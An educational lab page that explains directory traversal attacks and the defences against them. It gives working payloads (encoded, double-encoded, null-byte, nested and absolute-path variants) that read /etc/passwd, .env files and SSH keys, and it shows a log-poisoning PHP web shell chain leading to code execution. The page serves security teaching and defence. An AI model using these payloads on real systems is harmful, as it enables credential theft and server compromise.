Understand how attackers escape the web root using path manipulation, access sensitive server files, and what developers must do to prevent it.
Path Traversal Explained
A directory traversal vulnerability (also called path traversal or dot-dot-slash) allows an attacker to read files on the server that sit outside the intended web root directory. If a web application uses user-supplied input to construct file paths without proper sanitisation, an attacker can manipulate that input to access arbitrary files.
The classic payload is ../ — each ../ moves one directory up in the file system. By chaining these together, an attacker can reach the system root and read files like /etc/passwd, application configuration files, or private keys. In some cases, traversal leads directly to remote code execution when it can be combined with file upload or log poisoning techniques.
How File Systems and Web Roots Work — and Why the Gap Exists
To understand directory traversal, you need a clear mental model of how web servers relate to the file system they run on. A web server is configured with a "document root" — a specific directory that it treats as the top-level location for serving files. Requests are supposed to map only to files within that directory. Everything outside it — system files, application source code, configuration files, private keys — is supposed to be invisible to the web.
The filing cabinet analogy: Imagine a company has thousands of filing cabinets throughout the building: personnel records in HR, financial records in accounting, contracts in legal, and a public-facing brochure rack in the lobby. The receptionist is authorised to hand out anything from the lobby brochure rack when visitors ask. A directory traversal vulnerability is like a receptionist who, when asked for "brochure number 5," blindly follows any path the visitor specifies. Ask for "../../../HR/personnel/employee_salaries" and the receptionist walks to the HR department and retrieves it — because they never verify that the path stays within the lobby. The access boundary exists in policy, but not in implementation.
The technical reason this happens is straightforward: operating systems resolve relative path components before the application can validate them. When the server constructs a file path like /var/www/files/ + user input, and user input contains ../../../etc/passwd, the OS resolves the combined path to /etc/passwd before the application knows what happened. The application never sees the traversal — it just sees a valid resolved path.
What Lives Outside the Web Root — The High-Value Targets
The value of a directory traversal vulnerability depends on what sensitive files are accessible from the server. Understanding the typical Linux server file system layout is essential for knowing what to reach for:
/etc/passwd— User account list. Not passwords directly (those are in/etc/shadowwhich requires root), but reveals usernames, home directories, and shell paths — useful for targeted attacks./etc/shadow— Hashed passwords for all system users. Readable only by root — confirming traversal to this file means the web process runs as root, which is itself a critical finding./etc/nginx/nginx.conf,/etc/apache2/apache2.conf— Web server configuration. Reveals virtual host configurations, upstream proxies, authentication mechanisms, and other application endpoints.~/.ssh/id_rsa— SSH private key of the web server user. If readable, grants direct SSH access to the server without a password..env— Environment variables file used by many modern frameworks (Laravel, Django, Node.js). Typically contains database credentials, API keys, secret keys, and cloud provider tokens.- Application source code —
/var/www/app/config/database.php,/app/config.py— Hard-coded credentials, database connection strings, secret keys for signing tokens. /proc/self/environ— Process environment variables for the running web process. Often contains secrets passed as environment variables in container environments./var/log/apache2/access.log— Web server access log. Useful for log poisoning attacks that combine traversal with RCE.
http://169.254.169.254/ returns IAM credentials, instance identity, and configuration data. A Server-Side Request Forgery (SSRF) vulnerability — which is conceptually related to path traversal — can reach this endpoint and exfiltrate cloud credentials with account-level impact. Always test for SSRF alongside traversal in cloud environments.The Mechanics
Consider a web application that serves user-selected files like this:
https://target.com/download?file=report.pdfThe server constructs a path like: /var/www/files/report.pdf and returns the contents. Behind the scenes, the server code likely looks something like:
// Vulnerable: user input concatenated directly into path $filename = $_GET['file']; $path = "/var/www/files/" . $filename; echo file_get_contents($path); // No validation that $filename stays within /var/www/files/
If an attacker changes the parameter to a traversal sequence, the OS resolves it before the code runs:
https://target.com/download?file=../../../../etc/passwd # Server constructs: /var/www/files/../../../../etc/passwd # OS normalises to: /etc/passwd # file_get_contents reads and returns /etc/passwd contents
Web applications often try to block this by filtering ../. Attackers have developed many bypass techniques to evade these naive filters — the root problem is that filtering strings is not the same as enforcing path boundaries.
..\ is the equivalent traversal character. Windows also resolves forward slashes in paths, so ../ often works on Windows too. Windows-specific targets include C:\Windows\System32\drivers\etc\hosts, C:\inetpub\wwwroot\web.config, and C:\Windows\win.ini (a classic confirmation target because it's always present).Payloads in Practice
The most basic payload — works when no filtering is in place. The number of ../ sequences needed depends on how deep the web root is in the file system. Using more than needed is harmless — you can't traverse above the filesystem root. Six is usually sufficient to reach root from any realistic web root depth.
?file=../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ... # www-data entry confirms web server runs as www-data — expected # Any account with /bin/bash shell is a potential lateral movement target
When the server filters the literal string ../, URL-encoding the characters bypasses the string match. The web server or framework decodes the URL before passing the parameter to the application, so the application receives the decoded traversal sequence — but the string filter already checked the encoded version and found no match.
The invisible ink analogy: The filter is looking for visible blue pen markings. Writing the same message in invisible ink passes the filter. The reader (the OS path resolver) still reads the ink. URL encoding is invisible ink for string filters.
?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd # %2e = . (dot) # %2f = / (forward slash) # Decodes to: ../../etc/passwd # String filter saw: %2e%2e%2f — no match for "../" — passes # OS receives: ../../etc/passwd — traversal executes # Variant: encode only the slash, leave dots literal ?file=..%2f..%2fetc%2fpasswd # Variant: encode only the dots ?file=%2e./%2e./etc/passwd
Some WAFs and security filters decode the URL once before checking it, then the application server decodes it a second time. Double encoding exploits this two-decode pipeline: the filter checks the single-decoded version (still encoded), passes it, and the application receives the fully decoded traversal sequence.
# %25 is the URL encoding of % itself ?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd # WAF decodes once: %2e%2e%2f%2e%2e%2fetc%2fpasswd — no "../" → passes # App server decodes again: ../../etc/passwd → traversal executes # Breakdown: # %25 2e → %2e → . # %25 2f → %2f → /
In PHP versions prior to 5.3.4, the null byte (%00) in a string terminated it at the C language level, even if PHP continued processing. This allowed bypassing extension checks: the application validates that the filename ends in .jpg, but the OS opens the file up to the null byte, ignoring everything after it.
?file=../../../../etc/passwd%00.jpg # PHP extension check: filename ends in ".jpg" → passes validation # C-level fopen() call: string terminates at \x00 → opens /etc/passwd # The ".jpg" suffix is never seen by the OS # Modern PHP is not vulnerable — patched in PHP 5.3.4 (2010) # Still relevant for: legacy apps, embedded systems, some ICS software
Some developers implement traversal filters by removing ../ from user input rather than rejecting the request. If the removal is not recursive, an attacker can nest the traversal sequence so that removing the inner ../ reconstructs it from the outer characters.
The word puzzle analogy: If a filter removes the word "bad" from every string, submitting "bbadad" produces "bad" after the first removal pass. The filter ran once and stopped. Nested traversal payloads work the same way.
# Filter removes "../" once, left to right ?file=....//....//etc/passwd # Filter removes the inner "../": ....// → ../ after removal # Result after filtering: ../../etc/passwd → traversal executes # Variant with backslashes (mixed OS-style): ?file=..././..././etc/passwd # Remove "../": ././ → still traverses on some OS path resolvers
Some applications filter relative traversal sequences (../) but don't prevent absolute paths. If the user-controlled parameter is passed directly to a file-reading function without any path prefix being prepended, supplying an absolute path bypasses traversal filters entirely — there's nothing to traverse.
# Application code (vulnerable): $path = filter_traversal($_GET['file']); // removes "../" readfile($path); // but accepts absolute paths! # Payload — no traversal needed, absolute path used directly: ?file=/etc/passwd root:x:0:0:root:/root:/bin/bash ... # Also try: ?file=/etc/nginx/nginx.conf → web server config + virtual hosts ?file=/home/ubuntu/.ssh/id_rsa → SSH private key → direct server access ?file=/var/www/html/.env → application secrets
Traversal in Production Environments
A healthcare company runs a document management portal that allows authenticated users to download their own records. The download endpoint takes a filename parameter and serves files from /var/www/portal/documents/. A penetration tester notices the parameter in Burp and tests a basic traversal payload.
The /etc/passwd attempt returns content, confirming the vulnerability. Moving up the chain, the tester tries ../../../../var/www/portal/.env — the application's environment variable file. It contains the database hostname, username, and password, the application's JWT secret key (allowing arbitrary token forging), and an AWS S3 access key with access to the company's document storage bucket.
From one traversal vulnerability in a download endpoint, the tester has: database credentials, the ability to forge auth tokens as any user, and cloud storage access containing every patient document in the system. This is a complete data breach from a single file read.
.env file that contains credentials to a database holding PHI constitutes unauthorised access to protected health information. This is a reportable breach under HIPAA even if no patient records were directly read via the traversal.An attacker finds directory traversal on a PHP application and can read /var/log/nginx/access.log. The attacker then sends a crafted HTTP request where the User-Agent header contains PHP code: User-Agent: <?php system($_GET['cmd']); ?>. This request is logged verbatim to the access log.
Now the attacker uses the traversal to read the log file, but appends a command parameter: ?file=../../../../var/log/nginx/access.log&cmd=id. The PHP interpreter, which processes the file being read, executes the embedded code. The server runs id and its output appears in the response. Directory traversal has escalated to Remote Code Execution.
This chain — traversal → log poisoning → RCE — is a well-documented attack pattern. It elevates traversal from a "file disclosure" finding to a "full server compromise" finding and changes the CVSS score from High to Critical.
Traversal vulnerabilities are not only found by testers in custom applications — they appear in widely-used software packages and are assigned CVEs that affect thousands of deployments simultaneously. CVE-2021-41773 (Apache HTTP Server 2.4.49) was a path traversal vulnerability that allowed unauthenticated attackers to read files outside the document root and, in configurations with CGI enabled, execute arbitrary code. It was exploited in the wild within hours of disclosure.
A similar pattern occurred with CVE-2019-18935 (Telerik UI for ASP.NET), CVE-2018-1000600 (Jenkins), and multiple Cisco, Fortinet, and Pulse Secure VPN products. Each affected organisations that were running unpatched software. The lesson for defenders: directory traversal is not only a custom code problem. Dependency and network appliance patch management is equally important.
../, %2e%2e, and /etc/passwd in request parameters are unambiguous attack signatures. Web Application Firewalls and SIEM rules for these strings should be standard in any security monitoring setup.What Path Traversal Means for Infrastructure Security
- A single traversal vulnerability is a master key. Every file readable by the web server process is exposed: configuration files, credentials, source code, private keys, log files. The scope is not limited to "some user data" — it's the entire server file system accessible to the process.
- Traversal findings often cascade. Credentials found in
.envfiles unlock databases, cloud accounts, and third-party APIs. SSH keys found in home directories unlock direct shell access. JWT secrets found in config files unlock authentication bypasses. A single traversal exploit often yields multiple critical follow-on findings. - Principle of least privilege limits blast radius. The web server process should run as a user with the minimum permissions needed — no access to SSH keys, no access to other users' home directories, no read access to files outside the web root. If the web process can't read
/etc/shadow, traversal to it fails regardless of whether the vulnerability exists. Process isolation and file permissions are a critical compensating control. - The correct fix is allowlist-based path validation. Filtering
../is a blocklist approach and will always be bypassable with new encodings and techniques. The correct defence: resolve the full canonical path first usingrealpath()or equivalent, then verify the resolved path starts with the intended base directory. If it doesn't match, reject the request. This approach is encoding-agnostic and filter-bypass-proof.
$base = '/var/www/files/'; $real = realpath($base . $input); if (strpos($real, $base) !== 0) { die('Access denied'); } — this resolves all traversal sequences before checking the path, making encoding bypasses irrelevant.What You Need to Know
../ before the application sees it. Secure code must normalise (canonicalise) paths first with realpath() then validate — not filter strings before normalisation./etc/passwd, .env, SSH keys, web server configs, application source, /proc/self/environ. Each can cascade into further compromise...\ on Windows servers. Target C:\Windows\win.ini for confirmation, web.config for credentials.You've covered the theory. Now apply it hands-on in the simulated environment.
Start Lab — Directory Traversal →← Return to all labs